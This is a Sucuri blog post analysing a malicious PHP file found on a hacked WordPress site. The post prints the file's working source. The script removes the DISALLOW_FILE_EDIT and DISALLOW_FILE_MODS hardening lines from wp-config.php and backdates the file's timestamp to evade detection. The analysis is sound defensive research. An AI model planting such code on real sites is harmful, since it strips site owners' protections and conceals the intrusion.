• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Reverse Hardening WP Config

Reverse Hardening WordPress Config

July 30, 2019Luke Leal

FacebookTwitterSubscribe

Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions or features a website has, the more potential points of entry an attacker has to leverage.

For example, a popular method for hardening WordPress installations is to disable the backend theme and plugin editor, which normally allows direct modification to the code in any theme or plugin file.

Theme & Plugin Installers Used as Entry Points

Attackers can also take advantage of the theme and plugin installers within the wp-admin backend. However, instead of installing a legitimate theme or plugin, they use this feature to install a backdoor and maintain access to a compromised website.

Thankfully, WordPress has a feature that allows website owners to disable both the theme and plugin file editors and installers.

To accomplish this, the owner just needs to add a line to their wp-config.php file:

define( 'DISALLOW_FILE_EDIT', true ); //disables file editor
define( 'DISALLOW_FILE_MODS', true ); //disables both file editor and installer

Hardening Methods Reversed in wp-config.php

Since hackers are aware of the attack surface areas, it also makes sense that they would be aware of the most popular hardening methods and respond accordingly.

During a recent website cleanup, the following file was added to the hacked website to reverse the hardening method we described for wp-config.php.

./wp-admin/maint/replace.php:
<?php
$str = file_get_contents("../../wp-config.php");
$str = str_replace("define('DISALLOW_FILE_EDIT', true);","",$str);
$str = str_replace("define('DISALLOW_FILE_MODS', true);","",$str);
$ftime1 = filemtime("../../wp-config.php");
file_put_contents("../../wp-config.php", $str);
touch("../../wp-config.php", $ftime1, $ftime1);
echo "okok.";
?>

In this example, we found the malicious replace.php script in ./wp-admin/maint/.

When running the PHP script, it looks for wp-config.php (two directory levels above its current location).  It then uses str_replace to search for DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS, and looks up the modification timestamp for the wp-config.php file before removing the detected str_replace strings.

After the contents of the wp-config.php file have been adjusted, the script finally uses the touch function to alter the modification timestamp on the wp-config.php file in order to avoid detection.

Conclusion

In this particular case, the hacker compromised the website with an entirely different method and then added this malicious PHP file to further weaken the overall security of the website.

Unfortunately, there are a variety of other ways for hackers to compromise a website without using the theme and plugin editors or installers.

Employing a file integrity monitoring service like the free Sucuri WordPress plugin can be extremely helpful for early detection of a website hack. File integrity monitors won’t be fooled by altered timestamps. They are designed to alert website owners as soon as any changes to files are made against the baseline or last known good configuration.

FacebookTwitterSubscribe

Categories: Website Security, WordPress SecurityTags: Black Hat Tactics, Hacked Websites, WordPress Plugins and Themes

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.